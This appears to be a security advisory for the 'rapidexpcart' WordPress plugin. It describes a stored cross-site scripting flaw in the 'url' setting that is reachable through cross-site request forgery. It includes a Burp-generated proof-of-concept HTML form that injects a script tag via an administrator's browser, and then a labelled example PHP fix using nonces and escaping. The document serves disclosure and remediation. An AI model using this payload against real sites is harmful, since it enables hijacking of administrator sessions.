The plugin does not sanitize and escape the `url` parameter in the rapidexpcart endpoint before storing it and outputting it back in the page, leading to a Stored Cross-Site Scripting vulnerability which could be used against high-privilege users such as admin. Furthermore, the lack of CSRF protection means an attacker can trick a logged-in admin into performing the attack by submitting a hidden form.

1. Save the following as an .html file and open it in a browser where an Administrator is logged in.
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://172.28.128.6/wordpress/wp-admin/options-general.php?page=rapidexpcart%2Frapidexpcart.php" method="POST">
<input type="hidden" name="_action" value="save" />
<input type="hidden" name="url" value="<script>alert(document.domain)</script>" />
<input type="hidden" name="key[]" value="product" />
<input type="hidden" name="name[]" value="商品" />
<input type="hidden" name="order[]" value="1" />
<input type="hidden" name="key[]" value="cart" />
<input type="hidden" name="name[]" value="カート" />
<input type="hidden" name="order[]" value="2" />
<input type="hidden" name="key[]" value="event" />
<input type="hidden" name="name[]" value="" />
<input type="hidden" name="order[]" value="3" />
<input type="hidden" name="key[]" value="download" />
<input type="hidden" name="name[]" value="" />
<input type="hidden" name="order[]" value="4" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
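
One way a settings handler can close both gaps described above (missing CSRF protection, and missing sanitization on save and escaping on output). This is an added example, not the plugin's own code: the function names, option name and nonce action are hypothetical, only the `_action` and `url` field names come from the PoC, and it assumes the setting is meant to hold an http(s) URL.

```php
<?php
// Added example. Hypothetical names throughout; only `_action` and `url`
// are taken from the PoC request. Runs inside a WordPress admin page.
const REC_EXAMPLE_OPTION = 'rapidexpcart_example_url';   // hypothetical option name
const REC_EXAMPLE_NONCE  = 'rapidexpcart_example_save';  // hypothetical nonce action

// Call before the settings page is rendered.
function rec_example_handle_save() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    if ( ! isset( $_POST['_action'] ) || 'save' !== $_POST['_action'] ) {
        return;
    }
    // Only administrators may change the setting.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF check: dies unless the request carries the nonce issued by
    // rec_example_render_form(). A form hosted on another site cannot supply it.
    check_admin_referer( REC_EXAMPLE_NONCE );

    // Input handling: accept a single string only, never an array.
    $raw = ( isset( $_POST['url'] ) && is_string( $_POST['url'] ) )
        ? wp_unslash( $_POST['url'] )
        : '';
    // Sanitize on save: esc_url_raw() strips characters that are invalid in
    // a URL and rejects schemes outside the allow-list passed here.
    $url = esc_url_raw( trim( $raw ), array( 'http', 'https' ) );
    update_option( REC_EXAMPLE_OPTION, $url );
}

function rec_example_render_form() {
    $url = get_option( REC_EXAMPLE_OPTION, '' );
    ?>
    <form method="post">
        <?php wp_nonce_field( REC_EXAMPLE_NONCE ); // emits the hidden _wpnonce field ?>
        <input type="hidden" name="_action" value="save" />
        <!-- Escape on output: the stored value is attribute-encoded, so any
             markup that reached the database is rendered as text. -->
        <input type="text" name="url" value="<?php echo esc_attr( $url ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}
```

Escaping at output is kept even though the value is sanitized on save, so values stored before the fix are also rendered inert.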